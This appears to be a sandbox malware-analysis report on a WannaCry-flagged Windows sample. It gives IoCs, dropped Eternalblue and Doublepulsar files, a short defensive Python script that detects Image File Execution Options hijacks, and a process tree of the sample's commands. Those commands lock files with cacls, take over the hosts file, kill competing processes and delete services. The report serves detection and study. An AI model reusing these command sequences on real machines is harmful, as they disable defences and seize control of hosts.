Analysis
max time kernel
153s
max time network
158s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
14-07-2022 03:52
Static task
static1
Behavioral task
behavioral1
Sample
483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe
Resource
win10v2004-20220414-en
General
Target
483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe
Size
5.4MB
MD5
a755f76611af191caac97da04633b012
SHA1
ee2fba5a45e09e560c67f5107f76cf6e9a36ab53
SHA256
483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6
SHA512
b53fee6fb2b1013989e963b67f11924b8498e198b779fcfb49dc2154ca1a61c89f5abb32b91ed1052052a9c40f7ee1c2c58abf6ee1877b712d7b5899f2d97840
Malware Config
Signatures
Wannacry
WannaCry is a ransomware cryptoworm.
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | CPUInfo.exe
Drops file in Drivers directory 1 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | cmd.exe
Executes dropped EXE 1 IoCs
Processes:
pid | process
4592 | CPUInfo.exe
Sets file execution options in registry 2 TTPs 21 IoCs
Processes:
description | ioc | process
(all keys below \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\)
Key created | wax.exe | reg.exe
Key created | wuauc1t.exe | reg.exe
Set value (str) | wuauc1t.exe\debugger = "taskkill.exe" | reg.exe
Key created | 1.exe | reg.exe
Set value (str) | svchostr.exe\debugger = "taskkill.exe" | reg.exe
Set value (str) | csrss..exe\debugger = "taskkill.exe" | reg.exe
Key deleted | svchost.exe | reg.exe
Set value (str) | 2.exe\debugger = "taskkill.exe" | reg.exe
Set value (str) | 1.exe\debugger = "taskkill.exe" | reg.exe
Key created | nanol.exe | reg.exe
Key created | svchostr.exe | reg.exe
Key created | Systmss.exe | reg.exe
Set value (str) | Systmss.exe\debugger = "taskkill.exe" | reg.exe
Key created | ystmss.exe | reg.exe
Set value (str) | ystmss.exe\debugger = "taskkill.exe" | reg.exe
Key created | 2.exe | reg.exe
Key created | 3.exe | reg.exe
Set value (str) | nanol.exe\debugger = "taskkill.exe" | reg.exe
Key created | csrss..exe | reg.exe
Set value (str) | wax.exe\debugger = "taskkill.exe" | reg.exe
Set value (str) | 3.exe\debugger = "taskkill.exe" | reg.exe
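The Image File Execution Options rows above are not debugging, they are process blocking. When Windows starts an image named <name>, it checks HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<name> and, if a Debugger value exists, launches that program with the original command line appended instead of the image itself. With Debugger set to taskkill.exe, every attempt to start wax.exe, 1.exe, csrss..exe and the rest launches taskkill with an unusable command line, which exits at once, so the blocked image never runs. That is a cheap way for the sample to keep rival binaries off the host, and the deleted svchost.exe key shows it also removes a block someone else had placed. The Python below is an added example, not code from the sandbox or the sample: it parses report rows in the shape printed above (a subset of that table plus one unrelated row, constructed here), flags Debugger values outside an allow-list, emits the reg.exe commands that undo them, and includes a live scan of the same key through winreg for a Windows host. The row grammar, the allow-list and the live_ifeo_scan() helper are assumptions made here.

```python
r"""Flag Image File Execution Options (IFEO) Debugger hijacks in sandbox registry IoCs.

Added example for this report, not code from the sandbox or the sample.
SAMPLE_ROWS copies a subset of the "Sets file execution options in registry"
table (plus one unrelated row as a negative case); the row grammar, the
debugger allow-list and live_ifeo_scan() are assumptions made here.
"""
import ntpath
import re
from typing import Dict, List, Optional, Tuple

# Key prefix as the report prints it, and the same key as reg.exe addresses it
IFEO_ROOT = ("\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"
             "\\Image File Execution Options\\")
HKLM_IFEO = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"

# Debuggers you would accept as an IFEO Debugger on your estate (assumption: tune locally)
LEGIT_DEBUGGERS = {"vsjitdebugger.exe", "windbg.exe", "cdb.exe", "ntsd.exe"}

# One report row: <operation> <registry key>[ = "<data>"] <process>
ROW_RE = re.compile(
    r'^(?P<op>Key created|Key deleted|Set value \((?:str|int|bin)\))\s+'
    r'(?P<key>\\REGISTRY\\.*?)'
    r'(?:\s*=\s*"(?P<data>[^"]*)")?'
    r'\s+(?P<proc>\S+)$'
)

SAMPLE_ROWS = [  # constructed from the table above
    r'Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wax.exe reg.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wax.exe\debugger = "taskkill.exe" reg.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss..exe\debugger = "taskkill.exe" reg.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\1.exe\debugger = "taskkill.exe" reg.exe',
    r'Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe reg.exe',
    r'Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" CPUInfo.exe',
]


def parse_row(row: str) -> Optional[Tuple[str, str, Optional[str], str]]:
    """Split one report row into (operation, key, data or None, process)."""
    m = ROW_RE.match(row.strip())
    if not m:
        return None
    return m["op"], m["key"], m["data"], m["proc"]


def ifeo_target(key: str) -> Optional[Tuple[str, Optional[str]]]:
    """For a key under the IFEO root return (image name, value name or None)."""
    if not key.lower().startswith(IFEO_ROOT.lower()):
        return None
    image, _, value_name = key[len(IFEO_ROOT):].partition("\\")
    return image, (value_name or None)


def _debugger_exe(data: str) -> str:
    """Lower-case basename of the program a Debugger value points at (quoted path or bare name)."""
    data = (data or "").strip()
    token = data[1:].split('"', 1)[0] if data.startswith('"') else data.split()[0] if data else ""
    return ntpath.basename(token).lower()


def find_ifeo_hijacks(rows: List[str]) -> Tuple[Dict[str, str], List[str]]:
    """Return ({image: Debugger data} for values outside the allow-list, [images whose IFEO key was deleted])."""
    hijacks: Dict[str, str] = {}
    deleted: List[str] = []
    for row in rows:
        parsed = parse_row(row)
        if parsed is None:
            continue
        op, key, data, _proc = parsed
        target = ifeo_target(key)
        if target is None:
            continue
        image, value_name = target
        if op == "Key deleted" and value_name is None:
            deleted.append(image.lower())
        elif op.startswith("Set value") and (value_name or "").lower() == "debugger":
            if _debugger_exe(data or "") not in LEGIT_DEBUGGERS:
                hijacks[image.lower()] = data or ""
    return hijacks, deleted


def remediation_commands(hijacks: Dict[str, str]) -> List[str]:
    """reg.exe commands that remove the hijacking Debugger values."""
    return [f'reg delete "{HKLM_IFEO}\\{image}" /v Debugger /f' for image in sorted(hijacks)]


def live_ifeo_scan() -> Dict[str, str]:
    """Windows only: walk the HKLM IFEO key and return {image: Debugger data} outside the allow-list."""
    try:
        import winreg
    except ImportError:  # not on Windows: nothing to scan
        return {}
    found: Dict[str, str] = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, HKLM_IFEO[len("HKLM\\"):]) as root:
        for i in range(winreg.QueryInfoKey(root)[0]):  # [0] is the subkey count
            image = winreg.EnumKey(root, i)
            try:
                with winreg.OpenKey(root, image) as k:
                    data = str(winreg.QueryValueEx(k, "Debugger")[0])
            except OSError:  # no Debugger value under this image
                continue
            if _debugger_exe(data) not in LEGIT_DEBUGGERS:
                found[image.lower()] = data
    return found


if __name__ == "__main__":
    hijacked, removed = find_ifeo_hijacks(SAMPLE_ROWS)
    print("hijacked:", hijacked, "deleted:", removed)
    print("\n".join(remediation_commands(hijacked)))
    print("live:", live_ifeo_scan())
```

Run against the full table above, the same logic reports ten hijacked images (wax.exe, wuauc1t.exe, svchostr.exe, csrss..exe, Systmss.exe, ystmss.exe, nanol.exe, 1.exe, 2.exe, 3.exe) and one deleted key (svchost.exe). The live scan only needs read access to HKLM, so it does not require elevation; the allow-list is the one knob to adjust, since a developer box may legitimately register vsjitdebugger.exe there.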
Sets file to hidden 1 TTPs 13 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Processes:
attrib.exe pids: 4016, 3784, 1056, 4840, 2800, 3464, 4456, 2756, 1052, 3992, 4356, 4920, 5032
Stops running service(s) 3 TTPs
Yara matches:
resource | yara_rule
behavioral2/memory/2964-132-0x0000000000400000-0x0000000000A2E000-memory.dmp | upx
behavioral2/memory/2964-153-0x0000000000400000-0x0000000000A2E000-memory.dmp | upx
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation | 483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe
Modifies file permissions 1 TTPs 3 IoCs
Processes:
takeown.exe pids: 1860, 240, 1448
Drops file in System32 directory 18 IoCs
Processes:
description | ioc | process
(SP = C:\Windows\SysWOW64\config\systemprofile)
File opened for modification | SP\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | CPUInfo.exe
File created | SP\AppData\Local\Microsoft\Windows\INetCache\IE\ips138[1].htm | CPUInfo.exe
File opened for modification | C:\Windows\SysWOW64\ftp.exe | attrib.exe
File opened for modification | C:\Windows\SysWOW64\ftp.exe | attrib.exe
File opened for modification | SP\AppData\Local\Microsoft\Windows\History\History.IE5 | CPUInfo.exe
File opened for modification | SP\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | CPUInfo.exe
File opened for modification | C:\Windows\SysWOW64\WUDHostServices.exe | attrib.exe
File opened for modification | SP\AppData\Local\Microsoft\Windows\INetCache\IE | CPUInfo.exe
File opened for modification | SP\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3FE2BD01AB6BC312BF0DADE7F797388F_F2379ADA3CBEBD919394FF2BE001D546 | CPUInfo.exe
File created | SP\AppData\Local\Microsoft\Windows\INetCache\IE\G8L4QUQX.txt | CPUInfo.exe
File opened for modification | SP\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3FE2BD01AB6BC312BF0DADE7F797388F_F2379ADA3CBEBD919394FF2BE001D546 | CPUInfo.exe
File opened for modification | SP\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D56B4E335E80143B4541C1723368A393_DB64D7F70B0B0BA362A66F89CB02358F | CPUInfo.exe
File opened for modification | SP\AppData\LocalLow\Microsoft\CryptnetUrlCache | CPUInfo.exe
File opened for modification | SP\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D56B4E335E80143B4541C1723368A393_DB64D7F70B0B0BA362A66F89CB02358F | CPUInfo.exe
File opened for modification | SP\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | CPUInfo.exe
File opened for modification | SP\AppData\Local\Microsoft\Windows\INetCookies | CPUInfo.exe
File created | SP\AppData\Local\Microsoft\Windows\INetCache\IE\ips138[1].asp | CPUInfo.exe
File opened for modification | SP\AppData\LocalLow\Microsoft | CPUInfo.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
CPUInfo.exe pid: 4592
Drops file in Program Files directory 2 IoCs
Processes:
description | ioc | process
File opened for modification | C:\program files (x86)\stormii | attrib.exe
File opened for modification | C:\Progra~1\dll | attrib.exe
Drops file in Windows directory 64 IoCs
Processes:
483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe, File created: \??\c:\windows\demc.bat, \??\c:\windows\demo.bat, C:\windows\IIS\x86.dll, C:\windows\IIS\x64.dll, C:\windows\IIS\free.bat, C:\windows\IIS\CPUInfo.exe
483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe, File opened for modification: C:\windows\IIS\x64.dll, C:\windows\IIS\x86.dll
attrib.exe, File opened for modification: C:\Windows\srvany.exe, C:\Windows\svchost.exe
CPUInfo.exe, File created (all under C:\windows\IIS\): adfw.dll, exma-1.dll, adfw-2.dll, cnli-1.dll, exma.dll, Eternalchampion-2.0.0.xml, Esteemaudit-2.1.0.exe, ssleay32.dll, esco-0.dll, riar-2.dll, trfo-0.dll, trfo-2.dll, x86.dll, Eternalblue-2.2.0.fb, posh.dll, trfo.dll, 2.txt, crli-0.dll, dmgd-4.dll, etebCore-2.x64.dll, etebCore-2.x86.dll, tibe-1.dll, Esteemaudittouch-2.1.0.fb, Eternalchampion-2.0.0.fb, pcre-0.dll, pcreposix-0.dll, tucl.dll, zibe.dll, Doublepulsar-1.3.1.exe, dmgd-1.dll, etch-0.dll, libxml2.dll, posh-0.dll, riar.dll, Doublepulsar-1.3.1.xml, Eternalblue-2.2.0.xml, etchCore-0.x64.dll, libcurl.dll, libeay32.dll, zlib1.dll, Esteemaudittouch-2.1.0.exe, Eternalchampion-2.0.0.exe, etchCore-0.x86.dll, tibe.dll, tibe-2.dll, xdvl-0.dll, s.exe, coli-0.dll, eteb-2.dll, pcla-0.dll, pcrecpp-0.dll, Esteemaudittouch-2.1.0.xml, cnli-0.dll, trch.dll
Launches sc.exe 25 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
sc.exe pids: 4304, 3984, 1636, 5068, 3140, 4020, 3576, 3124, 384, 4852, 4932, 1532, 1412, 444, 1300, 3928, 4444, 916, 2760, 1644, 1992, 3288, 2668, 4608, 420
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exe pids: 4864, 4748
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exe pid: 648
Kills process with WMI 12 IoCs
Processes:
WMIC.exe pids: 3316, 4340, 2980, 240, 1320, 2756, 2412, 2088, 752, 1404, 2044, 3056
Kills process with taskkill 42 IoCs
Processes:
taskkill.exe pids: 4876, 1956, 3320, 5068, 2764, 3104, 4272, 4944, 3532, 4204, 2312, 2644, 1456, 3352, 4476, 3780, 2676, 3852, 1944, 1836, 2864, 3112, 1548, 4428, 3360, 3128, 1936, 1332, 2744, 2308, 2660, 876, 2236, 4500, 4148, 5080, 824, 432, 4036, 4532, 2100, 1260
Modifies data under HKEY_USERS 9 IoCs
Processes:
description | ioc | process
(all keys below \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\)
Set value (str) | Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | CPUInfo.exe
Set value (str) | Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | CPUInfo.exe
Key created | Internet Settings\ZoneMap\ | CPUInfo.exe
Set value (int) | Internet Settings\ZoneMap\UNCAsIntranet = "1" | CPUInfo.exe
Set value (str) | Internet Settings\5.0\Cache\Content\CachePrefix | CPUInfo.exe
Key created | WinTrust\Trust Providers\Software Publishing | CPUInfo.exe
Set value (int) | Internet Settings\ZoneMap\ProxyBypass = "1" | CPUInfo.exe
Set value (int) | Internet Settings\ZoneMap\IntranetName = "1" | CPUInfo.exe
Set value (int) | Internet Settings\ZoneMap\AutoDetect = "0" | CPUInfo.exe
Modifies registry class 1 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings | 483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe
Runs ping.exe 1 TTPs 2 IoCs
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
CPUInfo.exe pid 4592 (the report lists 64 entries, all from this process)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
pid process: Token privileges (in the order listed)
2756 WMIC.exe (sequence seen twice): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
2412 WMIC.exe: the same 21-entry sequence once, then SeIncreaseQuotaPrivilege again (the report lists 64 entries in total)
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
pid | process
2964 | 483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe (2 entries)
4592 | CPUInfo.exe (2 entries)
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
source pid process -> target pid process (writes)
2964 483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe -> 3428 cmd.exe (3)
2964 483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe -> 3316 cmd.exe (3)
3316 cmd.exe -> 3928 sc.exe (3)
3428 cmd.exe -> 2756 WMIC.exe (3)
3316 cmd.exe -> 5068 sc.exe (3)
3316 cmd.exe -> 4376 schtasks.exe (3)
3316 cmd.exe -> 3120 schtasks.exe (3)
3316 cmd.exe -> 4864 schtasks.exe (3)
3316 cmd.exe -> 4748 schtasks.exe (3)
3316 cmd.exe -> 3992 attrib.exe (3)
3316 cmd.exe -> 4356 attrib.exe (3)
3428 cmd.exe -> 4480 cmd.exe (3)
3428 cmd.exe -> 3328 cacls.exe (3)
3316 cmd.exe -> 2084 schtasks.exe (3)
3428 cmd.exe -> 4920 attrib.exe (3)
3428 cmd.exe -> 1060 cmd.exe (3)
3428 cmd.exe -> 1132 cacls.exe (3)
3428 cmd.exe -> 2412 WMIC.exe (3)
2964 483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe -> 1468 WScript.exe (3)
3428 cmd.exe -> 3140 sc.exe (3)
3428 cmd.exe -> 4204 taskkill.exe (3)
3428 cmd.exe -> 240 takeown.exe (1; the report lists 64 entries in total)
Views/modifies file attributes 1 TTPs 15 IoCs
Processes:
attrib.exe pids: 3992, 4920, 3784, 1056, 2800, 1408, 872, 2756, 1052, 4840, 4356, 4016, 3464, 4456, 5032
Processes
Tree depth in brackets; the signatures each process triggered are listed beneath its command line.
[1] C:\Users\Admin\AppData\Local\Temp\483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\483c7fa66d9cf56e48741b7c4516906c78d71a89ef64529266d607ff7e0544e6.exe"
    - Checks computer location settings
    - Drops file in Windows directory
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\SysWOW64\cmd.exe
      cmdline: cmd /c c:\windows\demc.bat
      - Drops file in Drivers directory
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\Wbem\WMIC.exe
        cmdline: wmic process where "name='server.exe' and ExecutablePath='C:\\program files (x86)\\stormii\\server.exe'" call Terminate
        - Kills process with WMI
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe
        cmdline: cacls "C:\program files (x86)\stormii\server.exe" /d everyone
    [3] C:\Windows\SysWOW64\attrib.exe
        cmdline: attrib +s +h +r +a "C:\program files (x86)\stormii"
        - Sets file to hidden
        - Drops file in Program Files directory
        - Views/modifies file attributes
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe
        cmdline: cacls "C:\program files (x86)\stormii" /d everyone
    [3] C:\Windows\SysWOW64\Wbem\WMIC.exe
        cmdline: wmic process where "name='conhost.exe' and ExecutablePath='C:\\program files (x86)\\windows nt\\conhost.exe'" call Terminate
        - Kills process with WMI
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\sc.exe
        cmdline: sc delete SuperProServerST
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\taskkill.exe
        cmdline: taskkill /f /t /im ftp.exe
        - Kills process with taskkill
    [3] C:\Windows\SysWOW64\takeown.exe
        cmdline: takeown /f C:\Windows\SysWOW64\ftp.exe /a
        - Modifies file permissions
    [3] C:\Windows\SysWOW64\takeown.exe
        cmdline: takeown /f C:\Windows\System32\ftp.exe /a
        - Modifies file permissions
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe
        cmdline: cacls C:\Windows\System32\ftp.exe /g users:f
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe
        cmdline: cacls C:\Windows\SysWOW64\ftp.exe /g users:f
    [3] C:\Windows\SysWOW64\attrib.exe
        cmdline: attrib +s +h +r C:\Windows\SysWOW64\ftp.exe
        - Sets file to hidden
        - Drops file in System32 directory
        - Views/modifies file attributes
    [3] C:\Windows\SysWOW64\attrib.exe
        cmdline: attrib +s +h +r C:\Windows\System32\ftp.exe
        - Sets file to hidden
        - Drops file in System32 directory
        - Views/modifies file attributes
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe
        cmdline: cacls C:\Windows\SysWOW64\ftp.exe /d everyone
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe
        cmdline: cacls C:\Windows\System32\ftp.exe /d everyone
    [3] C:\Windows\SysWOW64\takeown.exe
        cmdline: takeown /f C:\Windows\system32\Drivers\etc\hosts /a
        - Modifies file permissions
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe
        cmdline: cacls C:\Windows\system32\Drivers\etc\hosts /g users:f
    [3] C:\Windows\SysWOW64\attrib.exe
        cmdline: attrib -s -h -a -r C:\Windows\system32\Drivers\etc\hosts
        - Views/modifies file attributes
    [3] C:\Windows\SysWOW64\attrib.exe
        cmdline: attrib +s +h +a +r C:\Windows\system32\Drivers\etc\hosts
        - Sets file to hidden
        - Views/modifies file attributes
    [3] C:\Windows\SysWOW64\ipconfig.exe
        cmdline: ipconfig /flushdns
        - Gathers network information
    [3] C:\Windows\SysWOW64\attrib.exe
        cmdline: attrib -h -r -s -a C:\ProgramData
        - Views/modifies file attributes
    [3] C:\Windows\SysWOW64\taskkill.exe
        cmdline: taskkill /f /t /im CPUInfo.exe
        - Kills process with taskkill
    [3] C:\Windows\SysWOW64\taskkill.exe
        cmdline: taskkill /f /t /im up.exe
        - Kills process with taskkill
    [3] C:\Windows\SysWOW64\taskkill.exe
        cmdline: taskkill /f /t /im block.exe
        - Kills process with taskkill
    [3] C:\Windows\SysWOW64\taskkill.exe
        cmdline: taskkill /f /t /im cpu.exe
        - Kills process with taskkill
    [3] C:\Windows\SysWOW64\taskkill.exe
        cmdline: taskkill /f /t /im svshostr.exe
        - Kills process with taskkill
    [3] C:\Windows\SysWOW64\sc.exe
        cmdline: sc stop xtfya
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        cmdline: sc delete xtfya
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        cmdline: sc stop "Network Support"
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        cmdline: sc delete "Network Support"
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        cmdline: sc stop "HomeGroup Support"
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        cmdline: sc delete "HomeGroup Support"
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        cmdline: sc stop xtfy
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        cmdline: sc delete xtfy
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        cmdline: sc stop Natioanl
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        cmdline: sc delete Natioanl
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        cmdline: sc stop Natihial
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        cmdline: sc delete Natihial
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        cmdline: sc stop "Interactive Services Detection Report"
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        cmdline: sc delete "Interactive Services Detection Report"
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        cmdline: sc stop "mssecsvc2.0"
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        cmdline: sc delete "mssecsvc2.0"
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        cmdline: sc stop "mssecsvc2.1"
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        cmdline: sc delete "mssecsvc2.1"
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        cmdline: sc stop ServiceMais
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        cmdline: sc delete ServiceMais
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        cmdline: sc stop ServiceMaims
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        cmdline: sc delete ServiceMaims
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\attrib.exe
        cmdline: attrib +s +h +r C:\ProgramData\dll
        - Sets file to hidden
        - Views/modifies file attributes
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe
        cmdline: cacls C:\ProgramData\dll /d everyone
    [3] C:\Windows\SysWOW64\attrib.exe
        cmdline: attrib +s +h +r C:\Progra~1\dll
        - Sets file to hidden
        - Drops file in Program Files directory
        - Views/modifies file attributes
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe
        cmdline: cacls C:\Progra~1\dll /d everyone
    [3] C:\Windows\SysWOW64\attrib.exe
        cmdline: attrib +s +h +r c:\wax.exe
        - Sets file to hidden
        - Views/modifies file attributes
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe
        cmdline: cacls c:\wax.exe /d everyone
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe
        cmdline: cacls C:\ProgramData\Natihial\svshostr.exe /d everyone
    [3] C:\Windows\SysWOW64\cacls.exe
        cmdline: cacls C:\ProgramData\Microsoft\Natihial\cmd.exe /d everyone
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe
        cmdline: cacls C:\ProgramData\expl0rer.exe /d everyone
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe
        cmdline: cacls C:\windows\svchost.exe /d everyone
    [3] C:\Windows\SysWOW64\Wbem\WMIC.exe
        cmdline: Wmic Process Where "Name='cmd.exe' And ExecutablePath='C:\\ProgramData\\Microsoft\\Natihial\\cmd.exe'" Call Terminate
        - Kills process with WMI
    [3] C:\Windows\SysWOW64\schtasks.exe
        cmdline: schtasks /delete /tn "Adobe Flash Player Updaters" /f
    [3] C:\Windows\SysWOW64\Wbem\WMIC.exe
        cmdline: wmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\svchost.exe'" call Terminate
        - Kills process with WMI
    [3] C:\Windows\SysWOW64\Wbem\WMIC.exe
        cmdline: wmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\dll\\svchost.exe'" call Terminate
        - Kills process with WMI
    [3] C:\Windows\SysWOW64\Wbem\WMIC.exe
        cmdline: wmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\dll\\csrss.exe'" call Terminate
        - Kills process with WMI
    [3] C:\Windows\SysWOW64\Wbem\WMIC.exe
        cmdline: wmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\Natioanl\\svchostr.exe'" call Terminate
        - Kills process with WMI
    [3] C:\Windows\SysWOW64\Wbem\WMIC.exe
        cmdline: wmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\Natioanl\\csrss..exe'" call Terminate
        - Kills process with WMI
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\nm\\winlogin.exe'" call Terminate3⤵
- Kills process with WMI
-
